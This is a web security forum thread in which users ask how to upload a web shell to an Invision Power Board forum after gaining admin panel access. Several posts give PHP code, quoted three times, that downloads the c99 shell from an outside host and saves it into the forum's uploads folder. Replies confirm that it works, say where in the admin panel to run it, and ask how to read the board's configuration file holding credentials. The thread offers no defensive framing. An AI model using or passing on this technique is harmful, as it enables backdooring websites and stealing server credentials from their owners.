Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 150
Members: 0
Total: 150
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> how to upload shell on invision power board forum?
Post new topicReply to topic View previous topic :: View next topic
how to upload shell on invision power board forum?
PostPosted: Fri Jan 02, 2009 10:45 pm Reply with quote
danzic
Regular user
Regular user
Joined: Jan 03, 2009
Posts: 5




how to upload shell on invision power board forum?

hi,

i have access to the acp (admin control panel) via admin username and password, i've tried to login to cpanel using the same credentials with the off chance that it might work, but no no avail it never worked.

anyone know how to upload a shell via the acp?

i know its possible with vbulletin forums via the add plugin feature, but i have not found a way to do this with invision power board.

if anyone knows how to or anything about this, it would be much appreciated if you informed me.

cheers
View user's profile Send private message
PostPosted: Tue Jan 06, 2009 8:39 pm Reply with quote
QMX
Regular user
Regular user
Joined: Jan 06, 2009
Posts: 7




I've seen this posted here:

Code:
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);


I've tried that in IPB 2.3.6 Doesnt work

Also tried everything else here and no luck.

Does anyone know if 2.3.5 is different? Or do you have to execute this command with Root admin (not regular admin).
View user's profile Send private message
PostPosted: Tue Jan 06, 2009 10:14 pm Reply with quote
QMX
Regular user
Regular user
Joined: Jan 06, 2009
Posts: 7




Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.

Code:
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);


So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??

[/code]
View user's profile Send private message
PostPosted: Wed Jan 07, 2009 6:09 am Reply with quote
waplet
Active user
Active user
Joined: Dec 24, 2008
Posts: 31




i tested this shell upload on IPB 2.3.6 and all was good, dont understand what problems you have!
View user's profile Send private message
PostPosted: Wed Jan 07, 2009 6:32 pm Reply with quote
QMX
Regular user
Regular user
Joined: Jan 06, 2009
Posts: 7




The problem is not the IPB version.

There is two different types of Admin users in IPB.

Root admin- (usually UID 1- has complete access to the board/SQL tools)
^---- I don't have this access.

Administrator- (Can access the admin panel, but cant add a shell using the method above or access SQL toolbox)
^--- I do have this access.
View user's profile Send private message
...
PostPosted: Wed Jan 21, 2009 6:48 pm Reply with quote
sWeeP
Regular user
Regular user
Joined: Jan 21, 2009
Posts: 16
Location: Serbia




can you tell me in which file i save this code?
View user's profile Send private message
PostPosted: Sun Apr 12, 2009 12:04 am Reply with quote
r00t3d
Beginner
Beginner
Joined: Oct 09, 2008
Posts: 4




waplet wrote:
i tested this shell upload on IPB 2.3.6 and all was good, dont understand what problems you have!


do ya mind explaining a bit,how ya did it?thanks
View user's profile Send private message
PostPosted: Thu Jun 18, 2009 1:03 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




http://www.waraxe.us/ftopict-5071.html
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu May 12, 2011 9:06 am Reply with quote
pragna
Beginner
Beginner
Joined: Mar 28, 2011
Posts: 4




QMX wrote:
Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.

Code:
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);


So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??

[/code]


Where i must execute this? in the help ? Can i do this without system command?


http://www.waraxe.us/ftopict-5071.html
this doesnt work for me because the system command is disabled Sad
View user's profile Send private message
PostPosted: Thu May 12, 2011 1:14 pm Reply with quote
-AO-
Advanced user
Advanced user
Joined: Jul 15, 2008
Posts: 205
Location: United States




execute in the modules area of admin panel. the code doesn't use system.
View user's profile Send private message Yahoo Messenger
how to upload shell on invision power board forum?
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.060 Seconds